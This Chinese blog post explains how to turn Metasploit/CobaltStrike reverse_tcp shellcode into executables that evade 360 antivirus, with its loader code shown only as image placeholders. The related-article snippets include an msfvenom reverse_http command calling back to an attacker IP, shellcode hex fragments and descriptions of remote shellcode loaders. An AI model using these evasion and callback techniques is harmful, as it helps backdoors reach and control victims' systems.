使用shellcode打造MSF免杀payload及shellcode加载技术

最新推荐文章于 2024-06-17 17:04:42 发布
最新推荐文章于 2024-06-17 17:04:42 发布
阅读量5.4k 收藏 6
点赞数
分类专栏: 免杀相关 文章标签: shellcode 免杀
0x00 前言  
    经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。 
0x01 从哪里开始  
    shellcode是什么,可以去drops 搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它的payload均可以) 
CobaltStrike:payload>windows>meterpreter>reverse_tcp设置选项如下:监听9527端口。 
1.jpg
    接下来以同样的方式生成c格式的payload,打开payload查看: 
2.jpg
    没错,你看到的是shellcode,那么如何编译成我们需要的exe呢? 
0x02 如何执行shellcode  
    经过一番搜索,大致得到了这么几种执行shellcode的方法(c语言,其它语言执行shellcode的方法可自己去寻找) 
1: 
3.jpg
2: 
4.jpg
3: 
5.jpg
4: 
6.jpg
5: 
7.jpg
6: 
8.jpg
7: 
9.jpg
8: 
10.jpg
    使用vc6默认的Debug方式编译cpp代码,得到8个payload: 
11.jpg
分别使用360安全卫士(开启QVM及小红伞引擎,最新病毒库)和360杀毒扫描: 
12.jpg
13.jpg
    看起来,免杀是没有问题了,那么这些shellcode是否能正常执行呢?执行生成的8个exe测试下连接效果: 
14.jpg  
0x03 总结  
     实际测试过程中发现,减小exe的体积会增加被查杀的风险,使用默认的编译选项即可完美兔杀!  
     不同的编译器编译生成的exe免杀效果也不同哦!
jackey3Lin
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用MSF生成的shellcode打造免杀payload
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcodemsfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
使用shellcode打造MSF免杀payload
Coisini的博客
06-21 1919
0x00 前言 经常有同学提及MSF payload免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀payload,那就是shellcode。 0x01 从哪里开始 shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它...
木马免杀(篇二)shellcode 学习
Goodric的博客
08-10 1710
shellcode 是一段利用软件漏洞进行执行的机器码, 通常用汇编语言编写并被翻译为十六进制操作码,因常被攻击者用于获取系统的命令终端shell 接口,所以被称为 shellcode。说到获取系统的命令终端shell 接口,shell 是操作系统中提供给用户用于内核交互执行任意系统命令的应用程序。Windows操作系统中的shell 包括 命令提示符cmd 和 powershell 应用程序。Linux操作系统中的 bash shell
MSF实战免杀过静态:ShellCode加花指令
xf555er的博客
03-30 1163
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 908
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
免杀入门---shellcode免杀
LvHLong的博客
05-03 5478
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
红队武器库--在线Shellcode免杀平台(2020年老文)
J0o1ey Blog
10-04 2887
和几位dalao忙了几天 利用PHP+Python+GO三门语言写了一个在线shellcode免杀平台 在CS中生成X64的c shellcode,按照平台指定格式提交,即可一键生成免杀exe后门(过所有国产) 本人郑重承诺,不含任何后门!因为代码写的太烂,就不开源出来了 我也不会收集大佬们的c2 ip,今年hw我并不参加 本在线平台仅限攻防演练、授权渗透测试中使用,严禁用于非法用途(居心叵测之人自重,本系统带有溯源机制) 使用注册码进行账号注册后,会自动获取最近两次登录的ip并进行绑定,其他ip无法登
免杀】异或加密Shellcode免杀绕过火绒、360
z2560088的博客
03-19 2206
msfvenom生成c格式的shellcode 对该shellcode进行异或加密 #include<string> #include <iostream> using namespace std; using std::string; unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x0f\xb7.
通过Python实现Payload分离免杀过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
Python-AV-Evasion:执行shellcode使用python逃避AV检测
05-04
generate.py确实从给定的shellcode(从文件读取或由msfpayload / msfvenom插入)中生成python脚本(与以前的脚本类似),还可以选择添加Hyperion / Veil / 例如AV逃避)。 生成的脚本可以很好地与PyInstaller或类似...
MSF用户指南.docx
06-02
- **payload生成**:根据攻击目的,用户可以生成各种类型的payload,如shellcode,实现远程控制或数据窃取。 - **会话管理**:成功利用后,MSF可管理建立的会话,进行进一步的命令执行、文件传输等操作。 - **后...
MetaInject:在合法过程中注入Metasploit Shell代码
03-04
2. **生成Shellcode**:在Metasploit中,使用适当的payload生成器创建Shellcode,选择合适的行动,如建立持久性的后门或执行特定命令。 3. **编写注入代码**:使用C++或其他语言编写代码,实现注入机制。这可能包括...
shellcode免杀丨C语言三条指令免杀360!你还困吗?
HUYA69的博客
09-07 1779
shellcode免杀(1)C语言三条指令免杀360 ✉1 简介 描述有错的地方各位师傅海涵。 经过一下午的C语言测试,得出了十多种过360的·方法,这里拿三种c的方式过360(思路大体相同),还有一个c++的免杀360和火绒都可以过等有时间都可以跟大家更新。 ✉2 免杀过程 废话就不多讲了对于初学者友好发展,先看一遍制作过程,我们准备好msf和cs的shllecode msfvenom -p windows/meterpreter/reverse_tcp LHOST="自...
shellcode之360安全卫士免杀(shecodject)(一)
ZPFCD的博客
07-16 856
shellcode免杀
shellcode免杀之VirtualAlloc函数加载shellcode过杀软
orange777
02-27 978
go语言木马免杀
免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader​
qq_56426046的博客
10-04 2094
GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF、360和火绒。
使用MSF生成shellcode
weixin_34092455的博客
04-02 1036
使用MSF生成shellcode payloadshellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
C/C++ 远程ShellCode执行工具
热门推荐
CSDN
07-21 1万+
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值